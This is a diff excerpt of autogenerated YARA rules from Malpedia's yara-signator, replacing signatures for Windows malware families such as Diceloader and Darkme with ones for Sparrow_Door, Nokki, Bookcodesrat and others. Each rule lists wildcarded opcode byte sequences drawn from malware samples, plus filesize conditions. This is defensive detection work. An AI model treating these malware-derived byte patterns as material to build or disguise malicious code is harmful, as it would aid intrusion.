+		$sequence_9 = { ba01000000 b9f1000000 e8???????? 488945f0 488b05???????? }
 
 	condition:
-		7 of them and filesize < 1024000
+		7 of them and filesize < 246784
 }
-rule MALPEDIA_Win_Diceloader_Auto : FILE
+rule MALPEDIA_Win_Sparrow_Door_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e4ad2ec4-b137-51c9-b85d-da5f37acfb45"
+		id = "91053f9d-da7f-5861-a669-343fc4d9f35e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.diceloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.diceloader_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sparrow_door"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sparrow_door_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "1be6b9044c29cb995b59a77fc46c72f3850615efa951d1383ccf2030df818a85"
+		logic_hash = "c57cb5bf7003c0c8f6009858f16b398bf1f07f6fd24e51a6f375d303f48a1e92"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141302,32 +141057,32 @@ rule MALPEDIA_Win_Diceloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488bcb e8???????? 4c634518 488d4c2420 4c03c3 41ffd0 }
-		$sequence_1 = { ff15???????? 488bd7 488d0d14260000 e8???????? }
-		$sequence_2 = { 8b5710 4c8d054f250000 488b4f08 41b91f000000 e8???????? }
-		$sequence_3 = { 448b07 488d1569000000 8b5f04 488d0d4b1e0000 e8???????? 4885c0 7413 }
-		$sequence_4 = { 0fb6c2 8a13 48c1e804 488b44c430 488941f8 }
-		$sequence_5 = { ff15???????? 488b1e 4885db 7420 488b1b 498bd6 }
-		$sequence_6 = { 440f4fe8 48035d48 418bd5 488d4b30 e8???????? 418bd5 8945e0 }
-		$sequence_7 = { 488dac2450faffff 4881ecb0060000 4c8d3d7b250000 c705????????00000000 }
-		$sequence_8 = { 448b541620 8b5c1624 4c03d2 4803da 4533c9 458d7901 458b02 }
-		$sequence_9 = { 488bda 448bc1 488d1561ffffff 488d0d761d0000 e8???????? }
+		$sequence_0 = { 8b4c242c 33ed 03e8 13cb }
+		$sequence_1 = { ffd7 8b1d???????? 50 ffd3 3bc5 740c }
+		$sequence_2 = { 53 51 885c241c e8???????? 83c40c 6882050000 8d542454 }
+		$sequence_3 = { 83c414 8d542450 52 57 ff15???????? 85c0 0f8599feffff }
+		$sequence_4 = { 50 c684242401000000 e8???????? 68f3010000 8d8c241d030000 56 }
+		$sequence_5 = { 85c0 743c 8b442418 8d4c2414 51 6a0b }
+		$sequence_6 = { 53 55 8b6c240c 57 6a00 6880000000 6a03 }
+		$sequence_7 = { 8b35???????? ffd6 8b0d???????? 6a64 }
+		$sequence_8 = { 837c242064 0f8d58010000 d16c241c 7508 }
+		$sequence_9 = { 68ff1f0000 8d8c24c9000000 6a00 51 895c241c }
 
 	condition:
-		7 of them and filesize < 41984
+		7 of them and filesize < 155648
 }
-rule MALPEDIA_Win_Minibrowse_Auto : FILE
+rule MALPEDIA_Win_Tarsip_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "10e3be16-7c28-577f-b9d3-3ef306665a79"
+		id = "75e9f569-8d36-54c4-8e68-bdfe5fadb50e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.minibrowse"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.minibrowse_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tarsip"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tarsip_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "832a6f1a1806ae15f070571362445b96d0797510bb64e050cd468771ae5f3839"
+		logic_hash = "d620ca424e61c9ab1970fe1ca1122ff88c39fb4068349c8790c7e61013d76968"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141341,32 +141096,32 @@ rule MALPEDIA_Win_Minibrowse_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b10 488b442440 488b08 49b9fe54fd6de0b04522 4c030d???????? }
-		$sequence_1 = { eb00 488b45b8 8b10 488d4dd8 e8???????? eb00 488b15???????? }
-		$sequence_2 = { 48b82faa1e82712b2956 480305???????? 8b08 48b82faa1e82712b2956 480305???????? 8908 48b82faa1e82712b2956 }
-		$sequence_3 = { ffd0 4889442430 488b542430 488b4c2438 49b8ae95c15973721312 4c0305???????? 48b80ca985ca9581e688 }
-		$sequence_4 = { f7f1 89c1 48b85a5ff63d0a40dfa2 480305???????? 8908 48b85a5ff63d0a40dfa2 480305???????? }
-		$sequence_5 = { b903000000 31d2 f7f1 89c1 48b8d4f3e92d0d1244e8 480305???????? }
-		$sequence_6 = { 48894c2438 488b442438 4889442428 488b4c2440 48ba99b0f0dd579ba6c4 480315???????? 48b86641bd6f7fab0f25 }
-		$sequence_7 = { e9???????? 488b442438 48c7401000000000 488b442438 48c7401807000000 66c744244e0000 488b4c2438 }
-		$sequence_8 = { 01ca 48b9ae6044a06c22125f 48030d???????? 8911 a801 7502 eb36 }
-		$sequence_9 = { 4883ec48 88542447 4c89442438 48894c2430 488b4c2430 48894c2428 48ba856a0e13b3e6f301 }
+		$sequence_0 = { 895c2420 885c2410 6a25 68???????? 8d4c2414 899c243c010000 e8???????? }
+		$sequence_1 = { 53 68???????? 8d4c247c c78424940000000f000000 899c2490000000 889c2480000000 }
+		$sequence_2 = { b001 894c2410 88442414 0f85ff000000 8b742434 8b4614 8b4e18 }
+		$sequence_3 = { 7210 8b9424dc000000 52 e8???????? 83c404 84db 745c }
+		$sequence_4 = { ff15???????? 5b 33c0 5e c3 57 6a00 }
+		$sequence_5 = { 885c2470 6a0e 68???????? 8d4c2474 899c24bc0e0000 e8???????? 68ff000000 }
+		$sequence_6 = { 51 c68424c801000000 e8???????? 8bbc248c000000 be10000000 83c40c 39b42494000000 }
+		$sequence_7 = { 50 52 53 e8???????? 8b8690830000 8b08 }
+		$sequence_8 = { 8d44242c 50 8d4c242c 51 8d542424 52 ffd6 }
+		$sequence_9 = { eb03 897e08 8b5118 392a 7520 807f4500 7404 }
 
 	condition:
-		7 of them and filesize < 1779712
+		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Getmypass_Auto : FILE
+rule MALPEDIA_Win_Seasalt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "14973234-1738-56b7-9223-d08c6bb175b6"
+		id = "53347621-44c1-525f-89d0-f50b729b9b9d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.getmypass_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.seasalt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.seasalt_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "e0df53beaa529f0daff55ba7793f7f6ede1e6ce78673fcc88efeed0e172026bc"
+		logic_hash = "efb41d41f20a6c99bb3444a374f65b02c8e63a28ca4361b924bf5bfe71fe1970"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141380,32 +141135,32 @@ rule MALPEDIA_Win_Getmypass_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c404 85c0 0f8444010000 8b4508 50 e8???????? }
-		$sequence_1 = { 3b4d10 7d12 8b550c 0355fc 8b4508 0345fc 8a08 }
-		$sequence_2 = { 8b45e0 0fbe08 83f944 0f8535010000 837de400 750b 8b55e0 }
-		$sequence_3 = { 55 8bec 83ec08 c745fc00000000 8d45fc 50 68???????? }
-		$sequence_4 = { 55 8bec 83ec08 833d????????04 721d a1???????? }
-		$sequence_5 = { 0f8400010000 837de400 750b 8b45e0 }
-		$sequence_6 = { 8b4d0c 51 e8???????? 83c40c 8d95d8f5ffff 52 8b4508 }
-		$sequence_7 = { 8b45fc 50 6a00 ff15???????? 8985f4fbffff }
-		$sequence_8 = { 8a55f8 8811 ebe1 c745f400000000 8b45f4 8945ec }
-		$sequence_9 = { 83f944 0f85b4020000 837d9819 0f86aa020000 c745a400000000 8b55e0 83ea01 }
+		$sequence_0 = { 8d842474010000 6804020000 50 51 ffd5 }
+		$sequence_1 = { f7d1 2bf9 8d9578fcffff 8bc1 8bf7 8bfa 8d9578fdffff }
+		$sequence_2 = { eb26 8d4508 8db67ccb0010 6a00 50 ff36 }
+		$sequence_3 = { 33c0 53 57 8a1c10 }
+		$sequence_4 = { 81ec90010000 8d442400 50 6801010000 ff15???????? f7d8 1bc0 }
+		$sequence_5 = { 6a00 8d55e8 6a08 52 50 ffd3 8d4de0 }
+		$sequence_6 = { 8d8c247c010000 6880000000 51 ff15???????? b981000000 }
+		$sequence_7 = { 83f964 7d08 8a4301 43 3c2f 75eb }
+		$sequence_8 = { a1???????? 53 53 68???????? 8d942484000000 6800020000 }
+		$sequence_9 = { 51 ff15???????? 8d542412 52 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Green_Dispenser_Auto : FILE
+rule MALPEDIA_Win_Nokki_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "954f1c32-9e66-5f40-9a6c-8af93a40211b"
+		id = "5dc3d6e8-6868-523c-9edf-f4ac449ab566"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.green_dispenser"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.green_dispenser_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nokki_auto.yar#L1-L149"
 		license_url = "N/A"
-		logic_hash = "4d0e3b4ff260054d419dc5677f1ac18d6112aade6736ec0a9f2b7f8946b1fdb4"
+		logic_hash = "0fb121b3fe7dee465d08717e2553d7155ecc791f48d5f128590e890ccc5d33a8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141419,32 +141174,36 @@ rule MALPEDIA_Win_Green_Dispenser_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c404 897508 895dfc 85f6 7453 8b450c 895e08 }
-		$sequence_1 = { 8d3c9e 03c2 03fa 49 }
-		$sequence_2 = { ffb554fbffff e8???????? 83c404 ff75d0 ff15???????? 8bbd9cfbffff 8b8da0fbffff }
-		$sequence_3 = { 8b7d08 85ff 747e 391f 757a 6a18 e8???????? }
-		$sequence_4 = { c1f803 b9???????? 8d3c9530df4200 8b11 2b17 3bd0 }
-		$sequence_5 = { 50 8b8530e5ffff c645f40d 8b048550aa4500 ff3406 }
-		$sequence_6 = { 0f841d010000 397e04 0f8e14010000 8b4e08 894dec 51 8bd7 }
-		$sequence_7 = { 6a00 68???????? ff75e8 0f57c0 660fd645f1 c745ec09000000 ff15???????? }
-		$sequence_8 = { 8bec 53 56 8b750c 57 8bfa 83fe03 }
-		$sequence_9 = { 7436 ba02000000 e8???????? 8945fc 85c0 74bf 8bd0 }
+		$sequence_0 = { e8???????? 33d2 68ce070000 52 }
+		$sequence_1 = { e8???????? 33c9 68ce070000 51 }
+		$sequence_2 = { a1???????? a3???????? a1???????? c705????????b7634000 }
+		$sequence_3 = { 8b550c 83c41c 6a00 6880000000 }
+		$sequence_4 = { 8945ca 8945ce 668945d2 e8???????? 33c0 8945d6 8945da }
+		$sequence_5 = { c745ec5c374000 894df8 8945fc 64a100000000 8945e8 8d45e8 }
+		$sequence_6 = { 51 52 ff15???????? 85c0 0f85b1010000 8b957ce8ffff }
+		$sequence_7 = { 8d8db4f7ffff 51 68???????? 56 ffd3 }
+		$sequence_8 = { e8???????? 33c0 8d4dac 51 668945ac 8945ae }
+		$sequence_9 = { e8???????? 83c404 8bf0 8d850cf8ffff }
+		$sequence_10 = { 68???????? eb10 6a0b 68???????? eb07 6a0d }
+		$sequence_11 = { 83c40c 6bc930 8975e0 8db1a0e94000 8975e4 eb2b }
+		$sequence_12 = { 888888e84000 40 ebe6 ff35???????? }
+		$sequence_13 = { e8???????? ebde 8bc8 83e01f c1f905 8b0c8d80054100 c1e006 }
 
 	condition:
-		7 of them and filesize < 838656
+		7 of them and filesize < 454656
 }
-rule MALPEDIA_Win_Smac_Auto : FILE
+rule MALPEDIA_Win_Bookcodesrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "aa200520-854b-5bad-b989-05c108d9a8dd"
+		id = "f4de16d7-c6b7-5d95-8f65-784498dd67cf"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smac"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.smac_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bookcodesrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bookcodesrat_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "048e342bef93bb6d74cc2ec6d93a75375cb38005feab23ff54823997fa4e630f"
+		logic_hash = "86df5d17676a07501443cee06a4988ba13f3d4cc771e2022b238854a7e0b8406"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141458,32 +141217,32 @@ rule MALPEDIA_Win_Smac_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 59 59 8bd8 8d8514f1ffff c645fc16 e8???????? 6a01 }
-		$sequence_1 = { ffd6 8d45e0 50 ff35???????? c745e04d6f7665 c745e446696c65 c745e845785700 }
-		$sequence_2 = { c3 8bff 55 8bec 8b4508 56 8d34c5d0504100 }
-		$sequence_3 = { 668985fcfeffff 668985fefeffff 58 6a5c 66898500ffffff 58 6a63 }
-		$sequence_4 = { 33c0 668985f0efffff 8d8504f1ffff 50 8d85c0efffff 50 56 }
-		$sequence_5 = { 6aff ff7508 bbe9fd0000 50 53 ffd6 8bf8 }
-		$sequence_6 = { ff35???????? 66898d76ffffff c745a04765744d 66c745a46f64 c645a675 66c745a86546 c645aa69 }
-		$sequence_7 = { 58 6a5b 66894594 33c0 66894596 58 }
-		$sequence_8 = { 50 ffd6 53 6a07 8d8d34feffff 51 53 }
-		$sequence_9 = { 50 ff15???????? ffb568f4ffff ff15???????? 56 e8???????? 59 }
+		$sequence_0 = { c785f8010000097c504a 66c785fc0100004c4a c685fe0100006a 8845c8 488945c9 8945d1 668945d5 }
+		$sequence_1 = { 33d2 41b848090000 897c2444 897c2440 e8???????? 41ff942490000000 488d4c2444 }
+		$sequence_2 = { 4883c002 bf0c000000 488906 eb05 bf0b000000 488d4c2420 488bd3 }
+		$sequence_3 = { 33d2 41b808020000 e8???????? 0fb754245c 0fb74c2458 0fb744245a 0fb77c2456 }
+		$sequence_4 = { e8???????? cc 8b4b28 488b4308 498bd4 }
+		$sequence_5 = { 4885c9 7406 ff15???????? 4883bb7002000008 720c 488b8b58020000 e8???????? }
+		$sequence_6 = { 488bd0 e8???????? 89442438 41b901000000 488d8b30330000 488d542438 458d4103 }
+		$sequence_7 = { 66f2af 48f7d1 4c8d41ff 488d55c0 488d4d90 e8???????? }
+		$sequence_8 = { 488bf1 488d151bbd0200 488d0d30d50200 e8???????? 4883c9ff 488bfe 488bd8 }
+		$sequence_9 = { 32c2 ffc2 3433 428884058f070000 83fa14 7ce4 4863c2 }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 544768
 }
-rule MALPEDIA_Win_Satana_Auto : FILE
+rule MALPEDIA_Win_Photolite_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2e802f49-7188-54f8-af9a-7b169267990a"
+		id = "53c3df95-9bf0-54a3-a4f4-6196a8124e14"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.satana_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.photolite"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.photolite_auto.yar#L1-L167"
 		license_url = "N/A"
-		logic_hash = "97eda1bd522e83f5fcc03e351c0ecc778e9c052cbb2ce47bd57943571eacd366"
+		logic_hash = "f9046ee3a914a22a767c3824ddb8832f1006b7774a4b79556e164865f1d4f92c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141497,32 +141256,38 @@ rule MALPEDIA_Win_Satana_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 9c 90 8b1d???????? 6a00 }
-		$sequence_1 = { 50 68???????? a3???????? e8???????? 83c408 03df }
-		$sequence_2 = { a1???????? 6a00 03d2 52 50 ffd6 8b55ec }
-		$sequence_3 = { 83c404 8bf0 660f57c0 660f1345c4 8b5dc4 8b7dac }
-		$sequence_4 = { f7c200000002 7436 660f2805???????? 90 }
-		$sequence_5 = { 0fb64c0de8 c1ea04 0fb65415e8 8850ff 8808 0fb64c35ae }
-		$sequence_6 = { 50 68???????? e8???????? 83c414 eb14 ff15???????? }
-		$sequence_7 = { 83c404 68???????? eb33 8d4db0 51 }
-		$sequence_8 = { 8bc8 d1e8 83e101 33048d00904000 3305???????? a3???????? 33c0 }
-		$sequence_9 = { 57 8d45fc 50 3308 db6819 203c53 6840200800 }
+		$sequence_0 = { 4883f905 72e4 889db4010000 ba7e32f11a c785b801000035578374 }
+		$sequence_1 = { 4803cf 493bce 72e8 889d2c010000 c78530010000d857fc49 }
+		$sequence_2 = { c785e4020000b434516d c785e8020000813e467c c785ec02000097355758 c785f00200008022253d }
+		$sequence_3 = { 4c897020 55 488da858f9ffff 4881eca0070000 33db }
+		$sequence_4 = { c78568040000bb4e5450 c7856c040000a94d1c35 8b8560040000 8a855c040000 }
+		$sequence_5 = { c78530060000a8eeaa04 c78534060000a8fbc56a 8b8520060000 8a851c060000 }
+		$sequence_6 = { 72e8 889dd0030000 baff978142 c785d403000094f2f32c c785d80300009afbb270 c785dc030000d1f3ed2e }
+		$sequence_7 = { c74548ba572c54 8b4540 8a453c 84c0 7518 }
+		$sequence_8 = { 4885c0 0f8419010000 488b15???????? 4885d2 7517 ba01000000 33c9 }
+		$sequence_9 = { 488bcb 0f1f4000 66660f1f840000000000 8b448c24 35e6845659 }
+		$sequence_10 = { 41b8956927f2 e8???????? 488d4dd0 ffd0 b001 }
+		$sequence_11 = { 0f114020 0f104a30 0f114830 488b05???????? }
+		$sequence_12 = { 488d4c2430 41ffd0 85c0 7527 8b442420 2b442428 03442424 }
+		$sequence_13 = { 488d85a0010000 448838 488d4001 4883eb01 75f3 41b001 488d8da0010000 }
+		$sequence_14 = { 4d8d0480 0fb602 83e107 410200 41320429 }
+		$sequence_15 = { e8???????? b9100e0000 ffd0 488d95f0030000 4489bdf0030000 488d0d72aaffff e8???????? }
 
 	condition:
-		7 of them and filesize < 221184
+		7 of them and filesize < 99328
 }
-rule MALPEDIA_Win_Kugelblitz_Auto : FILE
+rule MALPEDIA_Win_Abcsync_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "db17bbb0-50e5-5fe6-929a-1431a26aafbe"
+		id = "02af896d-ede7-5659-a477-3d4aaff1c995"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kugelblitz"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kugelblitz_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.abcsync"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.abcsync_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "4575fda7b8a74c948e62c70a1906fcade3b297881f83d4f61f7fa59414771962"
+		logic_hash = "1265b61a325fe240ea536a84f366a66df81cfa15aa46380fd4f4b2886a744626"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141536,32 +141301,32 @@ rule MALPEDIA_Win_Kugelblitz_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 448bc0 83f8ff 0f8405010000 0f1f440000 488b4de8 }
-		$sequence_1 = { c3 488d0511430000 c3 488d0501430000 c3 }
-		$sequence_2 = { 4053 4883ec20 488bd9 488d0580230000 488901 }
-		$sequence_3 = { 4883c227 488b49f8 482bc1 4883c0f8 4883f81f 7669 }
-		$sequence_4 = { 483bd3 0f8727010000 48896c2430 4883ca07 488b6918 }
-		$sequence_5 = { 488d542448 488d4c2470 480f47542448 e8???????? 488b442470 }
-		$sequence_6 = { 488d0da2410000 e8???????? 85c0 742e 32c0 eb33 }
-		$sequence_7 = { 33db eb49 4881f900100000 7238 }
-		$sequence_8 = { 4a8d1409 e8???????? 48895de8 488b8f80000000 ff15???????? }
-		$sequence_9 = { 488b442470 4533c0 ba02000000 48634804 488d442470 }
+		$sequence_0 = { 488b15???????? 41be2c010000 33c9 458bc6 ff15???????? 488b15???????? 4533e4 }
+		$sequence_1 = { 8d4108 410fb64c1a07 4898 422a0c18 b81f85eb51 }
+		$sequence_2 = { ba01000000 85c9 7e13 8bc1 0f1f840000000000 c1e204 }
+		$sequence_3 = { 4c63c2 488bcb 33d2 e8???????? 8b542454 418bfc 4c8b35???????? }
+		$sequence_4 = { 488d4c2420 c74424205c595f6a c74424245c653601 e8???????? 488905???????? 488b4c2428 }
+		$sequence_5 = { 2bc8 8d411c 4898 420fb60c18 410fb7441a36 662bc1 418d491d }
+		$sequence_6 = { 488d057d3b0100 488945e0 895128 488d0d17950000 488b45d8 488908 488d0d69200100 }
+		$sequence_7 = { 75d4 0f1101 498bd1 0f114110 0f114120 0f114130 0f114140 }
+		$sequence_8 = { 03d0 6bc232 2bc8 8d4116 420fb64c13fb 4898 422a0c18 }
+		$sequence_9 = { 2bc8 8d4121 420fb64c13fe 4898 422a0c18 }
 
 	condition:
-		7 of them and filesize < 82944
+		7 of them and filesize < 348160
 }
-rule MALPEDIA_Win_Agfspy_Auto : FILE
+rule MALPEDIA_Win_Scarecrow_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4e342af2-55f5-5fdc-91a0-c4e1164ec1ad"
+		id = "d4797137-49f1-5101-9dc1-24aec16a402a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agfspy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.agfspy_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarecrow"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.scarecrow_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "2c968cb953938166f8c4bb13e44158b837061eedd931abcb024c0888547d30a4"
+		logic_hash = "3c26486fac68aa14cbad0f26e91bc7559e11337af778c6912a8bda339578018a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141575,32 +141340,32 @@ rule MALPEDIA_Win_Agfspy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8901 8b0b 85c9 7405 8b01 ff5010 8933 }
-		$sequence_1 = { 8bc6 8b4d0c 890e 8b4d10 5f 894e04 5e }
-		$sequence_2 = { c744c81000000000 8d2cc8 8b4c241c c7451400000000 0f1001 0f114500 f30f7e4110 }
-		$sequence_3 = { 8bc8 6a01 ff12 8d4d98 e8???????? 0f57c0 c745e800000000 }
-		$sequence_4 = { b801000000 eb40 83ec08 c6462401 50 e8???????? 8945d0 }
-		$sequence_5 = { 5e 5b 8be5 5d c20400 8b470c 33f6 }
-		$sequence_6 = { 3c0a 7409 6a0a 8bce e8???????? 837f3c10 8d4728 }
-		$sequence_7 = { b001 c6460401 e9???????? 8b01 ff5018 83f8ff 7405 }
-		$sequence_8 = { e8???????? 0fb7ff eb16 0fb77c2410 8d4c2414 e8???????? 0fb7ff }
-		$sequence_9 = { 8bcf e8???????? 8bc8 e8???????? 8bc8 e8???????? 83ec18 }
+		$sequence_0 = { c645d951 c645da70 c645db4c c645dc70 c645dd2b c645de70 c645df16 }
+		$sequence_1 = { c645d55b c645d678 c645d77c c645d878 c645d928 c645da78 c645db7c }
+		$sequence_2 = { 40 74ec 5f 5e b801000000 5b }
+		$sequence_3 = { 56 6a49 68d340dedd ba0f000000 8bf1 e8???????? 83c408 }
+		$sequence_4 = { 99 f7fb 85d2 74d8 8a06 8bde 84c0 }
+		$sequence_5 = { 757b b905000000 8b45fc 99 f7f9 85d2 7405 }
+		$sequence_6 = { be05000000 0f1f440000 8b45b8 99 f7fe 85d2 7405 }
+		$sequence_7 = { 59 e9???????? c745dc03000000 eb7c c745e030024300 ebbb d9e8 }
+		$sequence_8 = { c745e030024300 e9???????? 83e80f 7451 83e809 7443 83e801 }
+		$sequence_9 = { 7528 e8???????? 85c0 0f847f020000 e8???????? 6a4d }
 
 	condition:
-		7 of them and filesize < 1482752
+		7 of them and filesize < 501760
 }
-rule MALPEDIA_Win_Darkme_Auto : FILE
+rule MALPEDIA_Win_Dispenserxfs_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1036dced-69e3-5dff-8a15-6ed9a4e7c833"
+		id = "dcad1348-3e3e-5861-ac43-e7a329125581"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkme"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkme_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dispenserxfs"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dispenserxfs_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "816ab6c03be8b7c8209c8913616f17d58c6b5480cc780d2ab0b0d2412d8ca815"
+		logic_hash = "8f86c5e67886e9169f08b08ef67943d3d51f035e4bbfcd62571f895fcd1de81c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141614,32 +141379,32 @@ rule MALPEDIA_Win_Darkme_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 40 f7d8 668985f0feffff 8d4d84 ff15???????? 8d8d70ffffff ff15???????? }
-		$sequence_1 = { eb12 8b95ecfeffff 81c2???????? 8995a8feffff 8b85a8feffff 8b08 8b95a8feffff }
-		$sequence_2 = { 8d4ddc 898d90feffff 8b9590feffff 8b02 8985e4feffff 6a00 8b4dc8 }
-		$sequence_3 = { 8b8504ffffff 8b08 8b01 52 ff9098030000 50 }
-		$sequence_4 = { c745f8???????? c745fc00000000 8b7508 8b06 56 ff5004 668b4d0c }
-		$sequence_5 = { 7459 c745fc08000000 6a10 8b55cc 52 8d45d0 50 }
-		$sequence_6 = { c745b801000000 c745b002000000 8b55d4 52 8d45b0 50 d9856cffffff }
-		$sequence_7 = { 898d24ffffff eb12 8b9530ffffff 81c2???????? 899524ffffff 8b8524ffffff 8b08 }
-		$sequence_8 = { 8b1491 52 68???????? e8???????? 8bd0 8d4dac ff15???????? }
-		$sequence_9 = { 6a00 6a00 6a01 6a08 8b9530ffffff 81c2???????? 52 }
+		$sequence_0 = { 68???????? e8???????? 8b4c242c 83c41c 8bc1 }
+		$sequence_1 = { 58 6689854affffff 33c0 66898574ffffff 8d45cc }
+		$sequence_2 = { 75ee 83c004 0fb708 66890f }
+		$sequence_3 = { 68???????? e8???????? 59 ff75fc ff15???????? eb0d }
+		$sequence_4 = { 47 84c0 75f8 8bca 8d85f8eeffff c1e902 f3a5 }
+		$sequence_5 = { 0f84e6000000 0fb74106 50 0fb74104 50 }
